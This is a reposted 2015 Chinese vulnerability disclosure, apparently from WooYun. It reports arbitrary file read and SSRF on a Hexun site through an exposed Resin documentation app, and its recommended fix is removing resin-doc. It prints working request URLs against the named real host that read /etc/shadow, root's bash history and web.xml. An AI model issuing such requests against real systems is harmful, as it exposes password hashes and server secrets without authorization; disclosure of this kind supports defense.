记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

和讯网某站点任意文件读取以及SSRF漏洞

2015-07-06 16:50

http://roll.hexun.com:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/shadow

10.png



有了它妈妈再也不用担心路径问题了...

http://roll.hexun.com:8080/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bash_history

11.png



SSRF

12.png



漏洞证明:

http://roll.hexun.com:8080/resin-doc/viewfile/?file=/WEB-INF/web.xml

13.png

修复方案:

删除resin-doc


知识来源: www.wooyun.org/bugs/wooyun-2015-0115529

阅读:113441 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“和讯网某站点任意文件读取以及SSRF漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云